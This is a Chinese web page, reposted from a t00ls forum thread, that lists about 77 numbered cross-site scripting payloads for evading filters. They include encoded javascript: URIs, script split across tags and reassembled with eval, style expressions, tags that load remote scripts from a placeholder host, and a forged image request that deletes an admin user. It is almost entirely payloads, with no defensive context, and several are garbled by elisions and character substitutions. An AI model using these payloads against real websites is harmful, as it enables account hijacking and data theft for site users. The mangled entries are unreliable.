我要评论<script src=http://3w.org/xss/xss.js></script>
(2)img标签xss使用javascript命令
<script src=http://3w.org/xss/xss.js></script>
(3)img标签无分号无引号
<img src=javascript:alert(‘xss’)>
(4)img标签大小写不敏感
<img src=javascript:alert(‘xss’)>
(5)html编码(必须有分号)
<img src=javascript:alert(“xss”)>
(6)修正缺陷img标签
<img “”"><script>alert(“xss”)</script>”>
(7)formcharcode标签(计算器)
<img src=javascript:alert(string.fromcharcode(88,83,83))>
(8)utf-8的unicode编码(计算器)
<img src=jav..省略..s')>
(9)7位的utf-8的unicode编码是没有分号的(计算器)
<img src=jav..省略..s')>
(10)十六进制编码也是没有分号(计算器)
<img src=java..省略..XSS')>
(11)嵌入式标签,将javascript分开
<img src=”jav ascript:alert(‘xss’);”>
(12)嵌入式编码标签,将javascript分开
<img src=”jav ascript:alert(‘xss’);”>
(13)嵌入式换行符
<img src=”jav ascript:alert(‘xss’);”>
(14)嵌入式回车
<img src=”jav ascript:alert(‘xss’);”>
(15)嵌入式多行注入javascript,这是xss极端的例子
<img src=”javascript:alert(‘xss‘)”>
(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>
(17)空字符12-7-1 t00ls - powered by discuz! board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print “<img src=java\0script:alert(\”xss\”)>”;’ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<scr\0ipt>alert(\”xss\”)</scr\0ipt>”;’ > out
(19)spaces和meta前的img标签
<img src=” javascript:alert(‘xss’);”>
(20)non-alpha-non-digit xss
<script/xss src=”http://3w.org/xss/xss.js”></script>
(21)non-alpha-non-digit xss to 2
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“xss”)>
(22)non-alpha-non-digit xss to 3
<script/src=”http://3w.org/xss/xss.js”></script>
(23)双开括号
<<script>alert(“xss”);//<</script>
(24)无结束脚本标记(仅火狐等浏览器)
<script src=http://3w.org/xss/xss.js?<b>
(25)无结束脚本标记2
<script src=//3w.org/xss/xss.js>
(26)半开的html/javascript xss
<img src=”javascript:alert(‘xss’)”
(27)双开角括号
<iframe src=http://3w.org/xss.html <
(28)无单引号 双引号 分号
<script>a=/xss/
alert(a.source)</script>
(29)换码过滤的javascript
\”;alert(‘xss’);//
(30)结束title标签
</title><script>alert(“xss”);</script>
(31)input image
<input src=”javascript:alert(‘xss’);”>
(32)body image
<body background=”javascript:alert(‘xss’)”>
(33)body标签
<body(‘xss’)>
(34)img dynsrc
<img dynsrc=”javascript:alert(‘xss’)”>
(35)img lowsrc
<img lowsrc=”javascript:alert(‘xss’)”>
(36)bgsound
<bgsound src=”javascript:alert(‘xss’);”>
(37)style sheet
<link rel=”stylesheet” href=”javascript:alert(‘xss’);”>
(38)远程样式表
<link rel=”stylesheet” href=”http://3w.org/xss.css”>
(39)list-style-image(列表式)
<style>li {list-style-image: url(“javascript:alert(‘xss’)”);}</style><ul><li>xss
(40)img vbscript
<img src=’vbscript:msgbox(“xss”)’></style><ul><li>xss
(41)meta链接url
<meta http-equiv=”refresh” content=”0;
url=http://;url=javascript:alert(‘xss’);”>
(42)iframe
<iframe src=”javascript:alert(‘xss’);”></iframe>
(43)frame
<frameset><frame src=”javascript:alert(‘xss’);”></frameset>12-7-1 t00ls - powered by discuz! board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6
(44)table
<table background=”javascript:alert(‘xss’)”>
(45)td
<table><td background=”javascript:alert(‘xss’)”>
(46)div background-image
<div style=”background-image: url(javascript:alert(‘xss’))”>
(47)div background-image后加上额外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<div style=”background-image: url(javascript:alert(‘xss’))”>
(48)div expression
<div style=”width: expression_r(alert(‘xss’));”>
(49)style属性分拆表达
<img style=”xss:expression_r(alert(‘xss’))”>
(50)匿名style(组成:开角号和一个字母开头)
<xss style=”xss:expression_r(alert(‘xss’))”>
(51)style background-image
<style>.xss{background-image:url(“javascript:alert(‘xss’)”);}</style><a
class=xss></a>
(52)img style方式
exppression(alert(“xss”))’>
(53)style background
<style><style
type=”text/css”>body{background:url(“javascript:alert(‘xss’)”)}</style>
(54)base
<base href=”javascript:alert(‘xss’);//”>
(55)embed标签,你可以嵌入flash,其中包涵xss
<embed src=”http://3w.org/xss/xss.swf” ></embed>
(56)在flash中使用actionscrpt可以混进你xss的代码
a=”get”;
b=”url(\”";
c=”javascript:”;
d=”alert(‘xss’);\”)”;
eval_r(a+b+c+d);
(57)xml namespace.htc文件必须和你的xss载体在一台服务器上
<html xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/xss/xss.htc”>
<xss:xss>xss</xss:xss>
</html>
(58)如果过滤了你的js你可以在图片里添加js代码来利用
<script src=””></script>
(59)img嵌入式命令,可执行任意命令
<img src=”http://www.xxx.com/a.php?a=b”>
(60)img嵌入式命令(a.jpg在同服务器)
redirect 302 /a.jpg http://www.xxx.com/admin.asp&deleteuser
(61)绕符号过滤
<script a=”>” src=”http://3w.org/xss.js”></script>
(62)
<script =”>” src=”http://3w.org/xss.js”></script>
(63)
<script a=”>” ” src=”http://3w.org/xss.js”></script>
(64)
<script “a=’>’” src=”http://3w.org/xss.js”></script>
(65)
<script a=`>` src=”http://3w.org/xss.js”></script>
(66)12-7-1 t00ls - powered by discuz! board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6
<script a=”>’>” src=”http://3w.org/xss.js”></script>
(67)
<script>document.write(“<scri”);</script>pt src=”http://3w.org/xss.js”>
</script>
(68)url绕行
<a href=”http://127.0.0.1/”>xss</a>
(69)url编码
<a href=”http://3w.org”>xss</a>
(70)ip十进制
<a href=”http://3232235521′>xss</a>
(71)ip十六进制
<a href=”http://0xc0.0xa8.0×00.0×01′>xss</a>
(72)ip八进制
<a href=”http://0300.0250.0000.0001′>xss</a>
(73)混合编码
<a href=”h
tt p://6 6.000146.0×7.147/”">xss</a>
(74)节省[http:]
<a href=”//www.google.com/”>xss</a>
(75)节省[www]
<a href=”http://google.com/”>xss</a>
(76)绝对点绝对dns
<a href=”http://www.google.com./”>xss</a>
(77)javascript链接
<a href=”javascript:document.location=’http://www.google.com/’”>xss</a>
您可能感兴趣的文章:
如您对本文有疑问或者有任何想说的,请 点击进行留言回复,万千网友为您解惑!
网友评论